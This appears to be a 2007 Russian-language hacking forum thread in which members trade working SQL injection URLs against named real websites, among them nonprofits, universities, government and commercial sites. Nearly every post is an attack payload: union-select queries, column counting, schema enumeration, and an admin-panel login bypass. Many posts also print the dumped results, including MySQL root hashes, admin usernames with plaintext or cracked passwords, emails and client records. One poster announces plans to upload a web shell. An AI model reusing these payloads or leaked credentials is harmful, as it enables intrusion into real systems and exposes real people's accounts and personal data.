http://www.rareconservation.org/news/article.php?id=-14+union+select+1,2,user(),4,concat(version(),0x3a ,database()),6,7,8,9,10,11,12,13,14,15,16,17,18+fr om+news/*

http://www.americanforests.org/news/display.php?id=-167+union+select+1,2,user,4,password,6,7+from+mysq l.user/*
root:*236FB56946627F45C458B3434306F66D085BAF25
liveweb:*9A15CDAE497B891F892D82CC25C89CB34CF519CC
adminweb:*160CC77703CF91DE69921040D35F94E46B897CB3
conference:*7769CBE36C25AA869D42E707102C5DBB948165 11

http://www.everson.org/news/article.php?id=-22+union+select+1,2,password,username+from+users/*
evers0n:z5Acrour

http://www.glaad.org/media/resource_kit_detail.php?id=-3495+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20+from+mysql.user/*

http://www.selfservice.org/article.php?id=-1887+union+select+concat(user(),0x3a,version(),0x3 a,database()),2,3,4,5,6,7/*
имееються таблицы:newsletter/members

_Pantera_

11.06.2007, 13:38

chat.chat_admin
http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(lo gin,char(58),password,char(58),name,char(58),email ),0x78),0x78),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26+from+chat.chat_admin/*onder.isik:3a90d4fe673f875337e06cf2b83051e1 - onder
mahir.hava:307b9b5e9a0ecd6437ddd389eb1c7396 - mahir

mysql.user
http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(us er,char(58),password),0x78),0x78),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+f rom+mysql.user/*root:57eeeb520498a5cb - 123321

kobifinans_faz3.member
http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(ni ck,char(58),pass),0x78),0x78),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+ kobifinans_faz3.member/*

kobifinans_faz3.user
http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(us er,char(58),pass),0x78),0x78),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+ kobifinans_faz3.user/*

fib_2_old.member
http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(ni ck,char(58),pass),0x78),0x78),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+ fib_2_old.member/*

fib_2_old.user
http://www.kobifinans.com.tr/ilan_kategori.php?Id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(concat(us er,char(58),pass),0x78),0x78),3,4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+ fib_2_old.user/*

_____________________

вот еще edu, но таблицы с юзерами не существует(
http://www.metinberber.ktu.edu.tr/tanitim.php?id=-2+union+select+1,2,3,4,5,6/*
metinberber:duyurular
metinberber:ip2nation
metinberber:menu
metinberber:tanitim
metinberber:visits
metinberber:yonetim

netadmin

11.06.2007, 17:15

Nu Nashol ia SQL Error na Gruzinskam Saite Top.ge
http://top.ge/stat_ip.php?ID='
no ne kak ne magu vipolnit SQL comandi pamagite pajalusta

alextoun

11.06.2007, 21:34

http://www.eval-net.org/?id=-1+union+select+1,2,version(),4,5,6,7/*щаз

http://www.eval-net.org/admin
аштачецом закрыто)

Серенький

11.06.2007, 22:00

Натати Портман

http://www.natalieportman.com/

уязвимость: http://www.natalieportman.com/npcom.php?page_number=149&newsid=1904'

-> смотрим версию, она оказывается четвертой. npcom@natalie.theplanet.host : 4.1.20 : natcom (user(),version(),database())
Пытаемся подобрать названия таблиц, но чего-то ничего не подходит, есть форум phpbb, но префикс подобрать также не удается. Зато есть доступ к таблицам базы mysql: http://www.natalieportman.com/npcom.php?page_number=149&newsid=-1904'+union+select+1,2,3,4,concat_ws(0x3a,user,pas sword,host),6+from+mysql.user+limit+10,1/* admin:536b46077018e797:localhost
-> смотрим в таблицу db, и видим, что имеются базы horde, phpmyadmin_6w2sCLlPLlk, sitebuilder3 . причем в базе sitebuilder3 удается подобрать таблицу users , и нужные к ней поля user_name, user_password, email; и находим запись
1:admin:21232f297a57a5a743894a0e4a801fc3
пароль очень сложный, но мы его подбираем - пароль admin ))

идем в админку
http://www.natalieportman.com/admin/логин/пасс , конечно, не подходят, но зато из-за отсутствия должной фильтрации, мы без труда в неё попадаем, введя в поле логина
' or 1=1/* и произвольное значение в поле пароль.

Constantine

12.06.2007, 02:10

Демократия по русски. я плакалъ -\
http://www.democracy.ru/article.php?id=247777+union+select+1,2,3,4,5,6,7,8 ,9,10,11,12,13,14,concat_ws(0x3a,user(),version(), database()),16/*

5 ветка
http://termini.lza.lv/article.php?id=9999999+union+select+1,concat(name, char(58),pass),concat_ws(char(58),version(),databa se(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17+f rom+users/*

KPOT_f!nd

12.06.2007, 04:04

Isis cмотрия антибоян.. Я уже выкладывал..)))

http://www.peopleandplanet.net/section.php?section=-5+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),email,5+from+user/*
имееться мылы, может пригодиться кому либо(

KPOT_f!nd

12.06.2007, 05:22

А. Лукьянченко Официальный сайт Донецкого городского головы
http://lukyanchenko.dn.ua/view.php?id=-3187+union+select+1,2,3,4,5,concat(user(),0x3a,ver sion(),0x3a,database()),7,table_name,9,10+from+inf ormation_schema.tables/*&cat=1&subcat=0&type=1

Институт математики экономики и механики Одесского национального университета им. И.И.Мечникова
http://www.imem.odessa.ua/faculties.php?id=-2+union+select+1,passwd,name,4,5,6,email,8,9+from+ users/*
webmaster:&WЂчS/`wDvxч)Ѓжў
webmaster@imem.odessa.ua

Ky3bMu4

12.06.2007, 13:41

http://www.grrn.org/releases/release.php?rid=78&id=6&rhid=-2+union+select+1,2,concat(user(),version())/*

Всё нашёл, подобрал, а ничё вывести не могу:

http://www.gsb.iastate.edu/projectsissues/news.php?id=-12+union+select+1,2,3,4,5/*
http://www.lib.umich.edu/aael/news.php?newsID=-150+union+select+1/*

Вот к этим не могу подобрать:
http://www.emiclassics.co.uk/release.php?id=-160149+union+select+1/* - пробовал до 102 столбца включительно(очень сломать хотелось :D ).

http://www.scotlandoffice.gov.uk/our-communications/release.php?id=-3565+union+select+1/* - до 41 включительно.

iv.

12.06.2007, 14:35

Только начал изучать sql-inj, первые две тривиальные инъекции:
http://opticalnet.ru/articles.phtml?id=-1%20union%20select%201,2,3,4,5/*
version: MySQL 5.0.33
database: opticalnet
user: root@localhost (хехе)
http://gsl.ru/offshore/list.phtml?cat=-1%20union%20select%201,2,3,4,5/*
version: MySQL 4.0.24-log
user: tgsl@pm25.zenon.net
database: tgsl

n1†R0x

12.06.2007, 15:42

reel-stream.com
http://www.reel-stream.com/headline.php?id=-1+union+select+concat(email,0x3a,password),2,3,4+f rom+user/*
пароли в чистом виде

Isis

12.06.2007, 16:07

http://opticalnet.ru/articles.phtml?id=-1%20union%20select%201,2,3,4,5/*

Вывод всех таблиц
http://opticalnet.ru/articles.phtml?id=-1+union+select+1,table_name,3,4,5+from+information _schema.tables/*

Хы, какие мы имеем права
http://opticalnet.ru/articles.phtml?id=-1+union+select+1,column_name,3,4,5+from+informatio n_schema.columns+where+table_name='user'+limit+1,5 0/*

Сейчас шеллик зальем =)

Isis

12.06.2007, 16:14

www.equipnet.ru
http://www.equipnet.ru/show_firm.php?firm_id=-23638+union+select+convert(concat_ws(0x3b,user(),d atabase(),version())+using+cp1251)/*

Barney

12.06.2007, 16:18

n1†R0x

12.06.2007, 16:22

до 15 дошел. дальше не пробовал
http://astrol.ru/index.php?page=125'+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10,11,12,13,14,15/*
хотя как я понял конструкция ордер бай действует так:
если больше например 15 столбцов - мы получаем корректный ответ. если меньше - ошибку.
ну вот
http://astrol.ru/index.php?page=125'+order+by+15/*

http://astrol.ru/index.php?page=125+order+by+7/*
http://astrol.ru/index.php?page=125+order+by+8/*
при 8 ошибка, значит столбцов меньше, чем 8
при 7 нет ошибки, значит столбцов 7, логично?

http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,5,6,7/*

rtfm

ps: опережая следующий вопрос:
вывод в 5ку... ошибка при выводе 'version()'
как выяснилось, несоответствие кодировок.
http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,convert(version()+using+cp1 251),6,7/*
pps: гм... http://astrol.ru/forum/admin/ инсталляшка Phorum'а)

Isis

12.06.2007, 16:28

www.sacr.sk
http://sacr.sk/article?id=-1+union+select+concat_ws(0x3b,user(),database(),ve rsion()),2/*&category=&lang=ru

}{0TT@БЬ)Ч

12.06.2007, 16:57

2Barney
ну и собственно сам админ
http://astrol.ru/index.php?page=-1+union+select+1,2,3,4,concat(username,char(48),us er_password),6,7+from+phpbb_users+limit+1,1/*

Ky3bMu4

12.06.2007, 17:06

http://www.databasepublish.com/

http://www.databasepublish.com/news.php?id=-51+union+select+1,version(),user(),4,5,6,7,8,9,10, 11+from+users/*

И даже есть доступ к таблице users! Но password вывадить решительно отказывается. Кидает на index.

http://www.grid.iu.edu/

http://www.grid.iu.edu/news/news.php?id=-68+union+select+1,2,user(),4,version(),6,7,8/*

Ну и так, по мелочи:

http://www.insanelygreatmac.com/news.php?id=-3571+union+select+concat(user(),1,version())/*
http://www.simonv.com/music/release.php?id=-78+union+select+concat(user(),version())/*
http://www.kaldor.com/media-release.php?id=-5+union+select+concat(user(),version())/*

Aerot1smo

12.06.2007, 20:17

http://canadatype.com/showfont.php?id=-1+union+select+version(),2,3,4,5,6/*
http://www.big6.com/showenewsarticle.php?id=-1+union+select+version(),2,3,4,5,6,7,8/*

Серенький

12.06.2007, 20:43

Би-2 (оф. сайт группы)

http://www.bdva.ru/

-> версия - пятерка

названия всех табличек и колонок выводятся без лимита посредством запроса:
http://www.bdva.ru/chtivo.phtml?id=-241+union+select+1,2,concat_ws(0x203a20,table_sche ma,table_name,column_name),4,5,6,7,8,9+from+inform ation_schema.columns/*
-> есть форум phpbb_users.
Есть еще табличка, где фигурируют пароли - radio_users http://www.bdva.ru/chtivo.phtml?id=-241+union+select+1,2,concat_ws(0x203a20,id,name,lo gin,pass,www,mail),4,5,6,7,8,9+from+radio_users/*

Isis

13.06.2007, 01:54

www.stanford.edu
version() - 5
http://www.stanford.edu/group/irepp/cgi-bin/event-detail-popup.php?recordID=-1+union+select+1,concat_ws(0x3b,user(),database(), version()),3,4,5,6,7,8,9,10,11,12/*

honors.uoregon.edu
http://honors.uoregon.edu/faculty/profiles/index.php?id=-12'+union+select+1,2,3,4,5,concat_ws(0x3b,user(),d atabase(),version()),7,8,9,10,'Mafia%20Of%20Antich at',12,13,14,15,16/*

BromTyZ

13.06.2007, 13:09

Помогите подобрать название таблицы с юзерам(админом) плиз!

http://sexsihop.in.ua/detail.php?detail=-1+union+select+1,2,3,4,5,6,7,8

Ky3bMu4

13.06.2007, 13:19

Чёт, сёня не прёт. :( :( :(

http://www.big6.com/showarticle.php?id=-415+union+select+concat(user(),version()),2,3,4,5/*
http://www.pimpsurveys.com/view-survey.php?id=737+union+select+1,user(),version(), database()/* - в самом низу.

hitex

13.06.2007, 14:22

http://www.crim.ncsu.edu/
http://www.crim.ncsu.edu/people_detail.php?id=-343+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,concat_ws(0x203a20,name,pwd),17+from+user/*
http://www.crim.ncsu.edu/people_detail.php?id=-343+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,concat_ws(0x203a20,user_login,user_pass),1+from +wp_users+limit+0,2/*

_Pantera_

13.06.2007, 16:12

http://women.unesco.kz/base.php?id=-2+union+select+concat(login,char(58),pwd)+from+use rs+limit+0,1/*

hitex

13.06.2007, 17:56

http://intercar.com.ua/index.php?id=-20+union+select+1,2,concat_ws(0x3b20,user(),databa se(),version()),4,5,6/*

V.I.P

13.06.2007, 21:02

Сайт: pec.spb.ru
http://www.pec.spb.ru/dictionary/?id=-218+union+select+1,concat_ws(char(58),name,passwor d,email),3+from+users+limit+8,1/*

Серенький

13.06.2007, 22:16

V.I.P Сайт: pec.spb.ru http://www.pec.spb.ru/dictionary/?id=-218+union+select+1,concat_ws(char(58),name,passwor d,email),3+from+users+limit+8,1/*

http://pec.spb.ru/admin/
login: kos
pass: s11111

---------------------------------------------------------------------------

BromTyZ

Помогите подобрать название таблицы с юзерам(админом) плиз!
Код:

http://sexshop.in.ua/detail.php?detail=-1+union+select+1,2,3,4,5,6,7,8/*

http://sexshop.in.ua/detail.php?detail=-1+union+select+1,2,3,concat_ws(0x3a,name,email,icq ,phone),5,6,7,8+from+clients+limit+1,1/*